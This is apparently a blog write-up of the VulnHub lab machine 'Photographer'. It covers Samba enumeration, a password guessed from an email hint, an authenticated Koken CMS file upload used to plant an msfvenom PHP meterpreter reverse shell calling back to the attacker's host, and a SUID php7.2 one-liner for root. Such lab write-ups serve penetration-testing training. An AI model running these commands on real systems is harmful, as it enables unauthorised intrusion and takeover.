VulnHub writeup: Photographer

When I first started getting into the infosec game – I learnt most of my skills from VulnHub. VulnHub is an excellent platform for learning penetration testing; whether you are new to infosec or experienced. In this article, a writeup of the machine Photographer is provided. The developer left a small description regarding the machine: This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.

After booting the machine, it was identified as 192.168.0.118. A few different nmap scans were conducted against the targeted system. The image above shows that there are four open ports. Deeper enumeration (nmap 192.168.0.118 -v -p- -A) revealed a Samba share and two web servers on port 80 and 8000. The web server on port 80 did not provide anything interesting when enumerating with Dirbuster and Nikto. However, the web server on port 8000 revealed a Koken CMS installation with a login form.

Enum4linux revealed the public share sambashare. The content was viewed by using smbclient. The share contained an interesting e-mail and a WordPress backup. The backup did not provide any useful information, such as the wp-config.php file.

However, the e-mail provided some interesting information. Two potential users are discovered: agi@photographer.com and daisa@photographer.com. AGI Clarence gave a hint to Daisa regarding the password, which is “my babygirl”. Will the password babygirl work for the Koken CMS? And yes, it does!

Moreover, a lookup in the Exploit Database revealed an Arbitrary File Upload (Authenticated) exploit for the current CMS. This would allow an attacker to execute PHP code and achieve a reverse shell through the image upload feature. A reverse meterpreter shell was generated using msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.51 LPORT=1234. The code is put into the local file meterpreter.php.jpg. From thereon, the “image” is uploaded using Koken’s “Import Content” feature.

Furthermore, the upload was intercepted with Burp Suite, as shown in the image above. The filename was changed to meterpreter.php and was then forwarded to the web server.

  1. Use Metasploit’s multi/handler
  2. Set the appropriate values
  3. Run the module
  4. Meterpreter session 1 opened
  5. Read the user flag in Daisa’s home directory
  6. Privilege escalation…?

LinPeas is downloaded on the targeted system using wget. The script will enumerate and list interesting files, folders, permissions, processes, etc. which can potentially be used to privilege escalate. The binary /usr/bin/php7.2 was listed as a SUID by LinPeas. Therefore, the binary can be used to execute commands as root. PHP is a part of GTFO bins, which means that it is capable of being misused for privilege escalation.

The command /usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);" executed /bin/sh with elevated privileges. We do now have root access on the targeted system.

Game over!

Conclusion

Photographer was both fun and realistic. Security misconfigurations provided us with relevant information throughout the enumeration phase, such as a public Samba share, usernames, and credential hints. The arbitrary file upload vulnerability on the CMS was exploited to achieve a foothold on the machine. From thereon, enumerating with LinPeas revealed that PHP was configured with SUID permission. The binary permission was exploited, which gave us root privileges. Overall, a series of misconfigurations were exploited to achieve root access.

Sincere gratitude goes to v1n1v131r4 for developing the machine. Make sure to check out his page at http://v1n1v131r4.com.